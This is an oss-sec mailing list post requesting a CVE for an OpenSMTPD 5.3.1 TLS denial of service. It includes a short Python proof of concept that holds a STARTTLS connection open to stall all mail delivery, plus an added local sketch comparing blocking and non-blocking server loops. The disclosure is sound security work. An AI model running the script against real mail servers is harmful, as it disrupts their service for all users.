oss-sec mailing list archives
CVE Request: DoS in OpenSMTPD TLS Support
From: "Jason A. Donenfeld" <Jason () zx2c4 com>
Date: Sat, 18 May 2013 16:27:22 +0200
Hi Kurt,

The SSL handling in the latest OpenSMTPD (5.3.1) misconfigures its sockets in blocking mode, allowing an attacker to prevent all mail delivery simply by holding a socket open. I discovered this accidentally, as I noticed my HP printer's smtp client would keep the connection indefinitely open after an unsuccessful authentication attempt, causing no more mail to be delivered until I SIGKILL'd my smtpd process or unplugged my printer.

The following reproduces the attack trivially:

#!/usr/bin/env python2
import smtplib
import time
print "[+] Connecting to server and initiating TLS"
smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587)
smtp.starttls()
print "[+] No clients will be able to connect as long as this remains open."
time.sleep(100000000)

Apparently this was fixed recently upstream, noting "evil client" in the commit message:
http://git.zx2c4.com/OpenSMTPD/commit/?id=38b26921bad5fe24ad747bf9d591330d683728b0

A snapshot has been posted to http://www.opensmtpd.org/archives/ , but no patch release has yet been made.

Jason
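The stall described in the message above, reduced to a local sketch (an added example, not OpenSMTPD code and not part of the original post): a single-threaded accept loop in which one blocking read stalls every other client, next to a non-blocking variant with an idle deadline. A plain TCP read stands in for the TLS handshake read, and `serve`, `second_client_served`, `BANNER` and `IDLE_LIMIT` are assumed names.

```python
import selectors, socket, threading, time
BANNER = b"220 mail.example.test ESMTP\r\n"  # constructed greeting
IDLE_LIMIT = 5.0                              # assumed per-client deadline (seconds)

def serve(listener, blocking, stop):
    """blocking=True: one blocking read (stand-in for the TLS handshake) stalls the loop."""
    sel = selectors.DefaultSelector()
    sel.register(listener, selectors.EVENT_READ)
    deadlines = {}
    def drop(conn):
        deadlines.pop(conn, None)
        sel.unregister(conn)
        conn.close()
    while not stop.is_set():
        for key, _ in sel.select(timeout=0.05):
            sock = key.fileobj
            try:
                if sock is not listener:
                    if not sock.recv(1024):   # EOF from the peer
                        drop(sock)
                    continue
                conn, _ = listener.accept()
                conn.sendall(BANNER)
                if blocking:
                    conn.recv(1024)           # waits for as long as the peer stays silent
                    conn.close()
                else:
                    conn.setblocking(False)
                    sel.register(conn, selectors.EVENT_READ)
                    deadlines[conn] = time.monotonic() + IDLE_LIMIT
            except OSError:
                if sock is not listener:
                    drop(sock)
        for conn in [c for c, t in deadlines.items() if t < time.monotonic()]:
            drop(conn)                        # evict clients that stayed idle too long

def second_client_served(blocking):
    """Hold one silent connection open; report whether a second client still gets greeted."""
    listener = socket.create_server(("127.0.0.1", 0))
    stop = threading.Event()
    threading.Thread(target=serve, args=(listener, blocking, stop), daemon=True).start()
    with socket.create_connection(listener.getsockname()) as idle:
        idle.recv(64)                         # greeted, then says nothing
        try:
            with socket.create_connection(listener.getsockname(), timeout=1.0) as probe:
                return probe.recv(64) == BANNER
        except OSError:
            return False
        finally:
            stop.set()
```

With the blocking read, the second client's TCP connect completes in the kernel backlog but no greeting ever arrives, which is also the symptom an external banner-timeout check would see.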